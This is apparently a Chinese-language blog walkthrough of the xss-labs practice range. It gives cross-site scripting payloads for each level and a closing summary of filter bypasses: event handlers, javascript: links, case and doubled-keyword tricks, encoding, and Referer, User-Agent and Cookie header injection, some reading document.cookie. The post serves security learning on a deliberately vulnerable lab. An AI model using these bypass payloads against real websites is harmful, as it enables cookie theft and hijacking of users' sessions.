xss-labs实操

已于 2023-09-22 11:56:27 修改
阅读量131 收藏
点赞数
文章标签: xss 前端
于 2023-09-17 13:58:28 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wutiangui/article/details/132942031
版权

文章目录

1.Level

无过滤法

2.Level2

“>闭合
“>&submit=搜索
通过观察发现alert里的引号没了,是不是被过滤了呢
因为如果该语句类似如下
<“Str”>,也就是说script在引号里面,那么是执行不了的,需要闭合操作,因此前面加个”>扔给前面的雨具语句
在这里插入图片描述

3.Level3

单引号闭合+事件函数
在这里插入图片描述

回显正常,但是没有执行,是什么原因呢,看下面这个发现是在input里
在这里插入图片描述

而input可以执行如下的事件函数
主要事件表:
在这里插入图片描述

这些都是可供参考的模式
因此构造payload:’ οnclick= alert(“123”)
出现了红色的onclick,前面用双引号不出现
在这里插入图片描述

但是发现alert前面被加了双引号,然后后面又有一个单引号和双引号
因此应该补一个单引号,所以
payload:’ οnclick=’ alert(“123”);
在这里插入图片描述

4.Level4

双引号闭合+事件函数
输入
发现返回了
在这里插入图片描述在这里插入图片描述

看这里也是用到了input,那么还是用事件函数
payload:" οnclick=alert(‘123’);"
在这里插入图片描述在这里插入图片描述

5.Level5

引号闭合+链接
输入
发现变成
在这里插入图片描述

说明script被过滤
在这里插入图片描述

还是input,还得用事件函数
输入" οnclick= "alert(‘123’);
在这里插入图片描述

o和n被插入了_,也就是说需要做关键字绕过
因此只能再寻找方法:"><a href=javascript:alert(‘xss’)>xss
发现这个方式没有过滤

在这里插入图片描述在这里插入图片描述

6.Level6

大小写绕过
在这里插入图片描述

script还是被过滤,不能用
在这里插入图片描述

onclicke也被过滤,不能用
在这里插入图片描述

href也是,那咋办呢
大小写绕过:"><a hRef=javascript:alert(‘xss’)>xss
在这里插入图片描述

7.Level7

多写绕过
这一关会直接删除script,会删除on
绕过方法很简单,多写就行:" oonnclick=alert(‘123’);"
即中间多写一个on,两边再接起来就行
在这里插入图片描述

8.Level8

unicode编码
href 和script都被过滤,大小写也没用
在这里插入图片描述

最后只能使用unicode编码
https://c.runoob.com/front-end/3602/
在这里插入图片描述

javascrIpt:alert('xss')
在这里插入图片描述在这里插入图片描述

9.Level9

unicode编码+//注释
或unicode编码+/**/注释
输入http://www.baidu.com,没有报错
在这里插入图片描述

输入:javascript:alert(‘xss’)//http://www.baidu.com
在这里插入图片描述

Unicode编码一下javascript:alert(‘xss’)
//表示注释后面的内容
javascript:alert(‘xss’)//http://
在这里插入图片描述在这里插入图片描述

10.Level10

隐藏标签赋值
需为t_sort赋值,需把type赋值为空,不然不显示
t_sort=123" type=“” οnclick="alert(‘xss’)
在这里插入图片描述在这里插入图片描述

11.Level11

手动编辑赋值
在这里插入图片描述

这一关也存在隐藏标签
t_link=123" type=“” οnclick=“alert(‘xss’)
t_history=123” type=“” οnclick=“alert(‘xss’)
t_sort=123” type=“” οnclick=“alert(‘xss’)
t_ref=123” type=“” οnclick="alert(‘xss’)
逐个试完还是只有t_sort有变化,但type被写死了
在这里插入图片描述

既然语句写不进去,那么手动编辑就好了,强制给type赋值

在这里插入图片描述在这里插入图片描述

referer注入
方法二是使用bp抓包通过修改入口referer链接实现
在这里插入图片描述在这里插入图片描述在这里插入图片描述

12.Level12

和上一关一模一样的做法
在这里插入图片描述在这里插入图片描述

12关方法二
UA头注入
在这里插入图片描述在这里插入图片描述

13.Level13

Cookie注入
在这里插入图片描述在这里插入图片描述
在这里插入图片描述

14关程序有误,链接点不进去,好像是个上传页面,要上传一个有exif漏洞的图片,算了,知道咋回事就行

14.xss绕过总结

1)测试需观察点

浏览器左下角查看器,查找注入点所在代码
burp响应包referer/UA/cookie三处位置看是否在提交包中有对应信息

2)无过滤法

3)">闭合

">

4)单引号闭合+事件函数

’ οnclick=’ alert(“123”);

5)双引号闭合+事件函数

" οnclick=alert(‘123’);"

6)引号闭合+链接

"><a href=javascript:alert(‘xss’)>xss

7)大小写绕过

"><a hRef=javascript:alert(‘xss’)>xss

8)多写绕过

" oonnclick=alert(‘123’);"

9)unicode编码

javascript:alert(‘xss’)
javascrIpt:alert(‘xss’)

10)unicode编码+//注释

javascript:alert(‘xss’)//http://www.baidu.com
javascript:alert(‘xss’)//http://

11)隐藏标签赋值

t_sort=123" type=“” οnclick="alert(‘xss’)

12)referer注入

“ type=”” οnclick=”alert(document.cookie)

13)UA头注入

“ type=”” οnclick=”alert(document.cookie)

14)Cookie注入

“ οnclick="alert(‘xss’) type=”

15)`替换()

在这里插入图片描述

16)实体编码绕过

https://www.qqxiuzi.cn/bianma/zifushiti.php ![在这里插入图片描述](https://img-blog.csdnimg.cn/cc64ab2427a9467c908905a947f9aaed.png)

17)–!>注释绕过

注释方式有两种:

只为了拿0day
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqli-labs第二十四关(二阶注入)
qq_42266432的博客
09-03 921
进入第二十四关,这关叫二阶注入,二阶注入个人感觉和存储型xss有些类似,大致分为以下几步: 攻击者在HTTP请求中提交恶意代码(可以是sql,js脚本等)。 应用将输存储在数据库以便后面使用并响应请求。 攻击者提交其他请求。 为处理其他请求,应用会检索已经存储的输入并处理它,从而导致攻击者注入的恶意代码被执行。 先去看看源码: login.php 中mysql_real_escape_string()函数可以转义 SQL 语句中使用的字符串中的特殊字符,无法注入 login_crea
xss-labs-master.rar
05-09
"xss-labs-master.rar" 提供了一个针对XSS漏洞的专项练习平台,旨在帮助初学者及安全爱好者提升对XSS攻击的理解和防御能力。这个靶机资源共分为二十个关卡,由浅入深,逐步引导用户掌握XSS攻防的核心技巧。 一、XSS...
Web渗透-XSS漏洞深入及xss-labs靶场实战
Varin
06-24 1480
xss全称(cross site scripting)跨站脚本攻击,是最常见的web应用程序安全漏洞之一,位于owasptop102013年度第三名xss是指攻击者在网页中嵌入客户端脚本,通常是javascrip编写的危险代码,当用户使用浏览网页时,脚本就会在用户的浏览器上执行,从而达到攻击者的目的
XSS-labs 实战(练习篇)
qtttgeq的博客
02-18 234
xss Labs通关
CTF 三大测试靶场搭建:DVWA、SQLi-LABS、upload-labs 靶场部署教程(VM + CentOS 7 + Docker)
zatongtong的博客
01-18 2293
基于 CentOS 7 系统,利用 Docker 部署 DVWA、SQLi-LABS、upload-labs 靶场,靶场的初始化,Docker 基本使用
upload-labs靶场
m0_62100902的博客
06-07 607
1 还是老样子,审查源码,寄,直接对文件头进行校验,那么之前的所有操作,不管是你改文件名也好,改路径也好,你的内容是不可能变的,所以之前的所以操作在这。2 观察之后的源码,取后缀名的流程为:去点,首尾去空,删除末尾的点,以末尾的点截取后缀名,后缀名大小写转换,去除末尾的字符串::$DATA,首尾去空。1 审查源码,ok,这里终于换成了白名单了,那么之前那些所有的操作在这里都挂掉了,因为之前的操作都是去对文件后缀名进行的操作,这里是白名单,无论如何。ps:每次上传成功的意思是上传并且6=phpinfo();
upload-labs靶场记录(1~13)
xhx836161547的博客
03-18 818
upload-labs文件上传靶场实验记录,目前只做了1~13关
XSS-lab靶场练习(1~5)
bin789456的博客
10-25 245
写在前面 https://github.com/do0dl3/xss-labs Level 1 没有什么过滤或者其他的什么,就是普通的get型传参 这里使用的也是我们非常常用的探测语句: <script>alert('xss')</script> Level 2 对于输入框: 在网页源代码中,我们输入的数据,是在表单中的value属性内,所以需要先闭合input标签,也是通过get来获取参数。 所以payload: "><script>alert('xss')
文件上传漏洞(upload-labs:1-4关)
DMXA的博客
12-10 147
通过上传功能,把恶意文件上传到服务器端,然后利用上传功能的不完善,绕过类型或者大小的限制,把恶意文件上传到服务器,从未实现攻击,如果服务器被入侵,就可能导致数据泄露等安全问题,所以对于文件上传功能,需要控制文件类型和大小数量,同时进行安全校验和过滤,防止文件上传的漏洞。
Web漏洞-Xss跨站
weixin_70557959的博客
05-05 730
[草稿] XSS跨站 发布时间:2022-04-23 21:43:11 作者:weixin_46544151 阅读数:0 标签:web安全,安全,网络安全 文章描述: 25.xss跨站之原理分类及攻击方法 一、本地环境XSS,漏洞原理讲解 在phpstudy中根目录创建1.php <?php $xss=$_GET['x']; echo $xss; ?> 浏览器打开,在网址后输入?x=1,网页输出1 输入?x=<script>alert(1)</script&...
xss-labs-master源码
07-06
"xss-labs-master"是一个专门设计的靶场,包含了20个级别的XSS练习,旨在帮助学习者深入理解和掌握XSS攻击的原理、类型以及防御策略。通过逐步解决这些精心设计的挑战,我们可以逐步提升对XSS攻击的理解,并提升安全...
xss-labs-master.zip(xss注入通关游戏/靶场)
03-21
`xss-labs-master.zip`包含了一个专门用于学习和实践XSS注入的通关游戏或靶场,对于网络安全测试人员来说,这是一个极好的学习资源。 **XSS分类** 1. **存储型XSS**:也称为持久型XSS,攻击者将恶意脚本存入服务器...
xss-labs.zip
03-18
这个“xss-labs.zip”文件显然是一个专门为学习和理解XSS漏洞而设计的实践平台,包含了20个具有不同XSS特征的网页示例。通过这个实验室,你可以深入学习如何检测、防范以及利用XSS漏洞。 XSS攻击通常分为三种类型:...
安装xss-labs ppt手册
10-22
**XSS漏洞详解与XSS-Labs安装指南** XSS(Cross Site Scripting),即跨站脚本攻击,是网络安全领域常见的一种攻击方式。它允许攻击者通过注入恶意脚本到网页中,使得用户在不知情的情况下执行这些脚本,从而获取...
XSS-DOM
qq_51502737的博客
08-18 758
我们可以通过这种方式去创建或者覆盖 document 或者 window 对象的某些值,但是看起来我们举的例子只是利用标签创建或者覆盖最终得到的也是标签,是一个HTMLElment对象。可以明显的看到这是个DOM XSS,用户的输入会构成一个新div元素的子结点,但在插入body之前会被移除所有的属性。但是对于大多数情况来说,我们可能更需要将其转换为一个可控的字符串类型,以便我们进行操作。最内层的svg先触发,然后再到下一层,而且是在DOM树构建完成以前就触发了相关事件。先注释掉过滤代码,此时正常弹窗。
xss.function靶场(hard)
丁航航的博客
08-18 460
目前啥也不输入,直接进入查看。
XSS总结知识点+例题实操
最新发布
代码其实很简单
08-19 890
XSS也是属于注入攻击的一类,他是通过构造一个JS代码,注入到网页中,由用户的浏览器来请求源码且运行达到攻击的效果;2、XSS的危害3、XSS产生的原因4、反射性XSS5、存储型XSS6、DOM的XSS8、XSS的防御及修复9、XSS很多时候就是一边测试性的输入一边查看html源码,可以通过查看源码查看系统对我构造的js注入做了什么防御;10、XSS的绕过2、DOM型XSS --向源html码中插入代码,破坏源DOM因为我们js中也有tel,cid等这些关键字/函数,那么当你在前端用这些关键字/函数的时候
XSS的DOM破坏
m0_67441173的博客
08-17 926
@keyframes x{}
xss-labs安装
07-28
XSS-labs是一个用于学习和测试跨站脚本攻击(XSS)的平台。根据引用\[1\],在学习了XSS的基础知识并完成了一些简单的XSS测试后,可以开始攻略XSS-labs。不过需要注意的是,对于XSS-labs,我们只需大致了解一些思路...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值